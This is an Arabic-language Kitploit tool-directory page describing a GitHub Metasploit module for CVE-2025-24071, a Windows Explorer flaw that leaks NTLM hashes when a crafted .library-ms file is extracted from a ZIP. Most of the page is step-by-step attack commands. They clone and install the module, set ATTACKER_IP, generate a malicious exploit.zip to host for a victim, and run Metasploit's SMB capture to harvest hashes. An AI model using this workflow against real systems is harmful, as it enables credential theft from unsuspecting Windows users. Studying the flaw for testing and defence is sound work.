Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24071-msfvenom — وحدة Metasploit لثغرة CVE-2025-24071 - تسريب تجزئة NTLM في ويندوز عبر .library-ms | Kitploit
أدوات/GitHubGitHub/folks-iwd/cve-2025-24071-msfvenom
أطر الاستغلالهجمات كلمات المرورتوليد الحمولةتحليل الثغرات الأمنيةالاستغلال
GitHubfolks-iwd/cve-2025-24071-msfvenom

CVE-2025-24071-msfvenom

وحدة Metasploit لثغرة CVE-2025-24071 - تسريب تجزئة NTLM في ويندوز عبر .library-ms

عرض المستودع
255منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24071: تسريب تجزئة NTLM عبر ملف .library-ms (وحدة Metasploit)

يحتوي هذا المستودع على وحدة Metasploit لاستغلال CVE-2025-24071، وهي ثغرة في Windows Explorer تؤدي إلى تسريب تجزئات NTLM عند استخراج ملف .library-ms خبيث من أرشيف ZIP.

تم التطوير بواسطة: FOLKS-IWD


نظرة عامة

تحدث الثغرة عندما يقوم المستخدم باستخراج أرشيف ZIP يحتوي على ملف .library-ms مُصمَّم خصيصًا. يبدأ Windows Explorer تلقائيًا طلب مصادقة SMB إلى خادم بعيد محدَّد في الملف، مما يؤدي إلى تسريب تجزئة NTLM الخاصة بالمستخدم دون أي تفاعل من المستخدم.

تعمل وحدة Metasploit هذه على:

  1. إنشاء ملف .library-ms خبيث.
  2. وضعه في أرشيف ZIP.
  3. التكامل مع وظيفة التقاط SMB في Metasploit لجمع تجزئات NTLM. image

التثبيت

  1. استنساخ المستودع:
    root@kitploit:~
    git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
    cd CVE-2025-24071-msfvenom
    
  2. انسخ الوحدة إلى دليل وحدات Metasploit الخاص بك:
    root@kitploit:~
    cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
    

الاستخدام

  1. قم بتحميل الوحدة:
    root@kitploit:~
    use auxiliary/server/ntlm_hash_leak
    
  2. قم بتعيين الخيارات المطلوبة:
    root@kitploit:~
    set ATTACKER_IP 192.168.1.162  # Replace with your IP address
    set FILENAME exploit.zip       # Name of the malicious ZIP file
    set LIBRARY_NAME malicious.library-ms  # Name of the .library-ms file
    set SHARE_NAME shared          # SMB share name
    
  3. قم بتشغيل الوحدة :
root@kitploit:~
  run
  1. ستقوم الوحدة بإنشاء ملف ZIP خبيث (exploit.zip). قم باستضافة هذا الملف ليتمكن الضحية من تنزيله واستخراجه.
  2. استخدم وحدة التقاط SMB من Metasploit لجمع تجزئات NTLM:
    root@kitploit:~
    use auxiliary/server/capture/smb
    set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
    run
    
تنزيل الأداة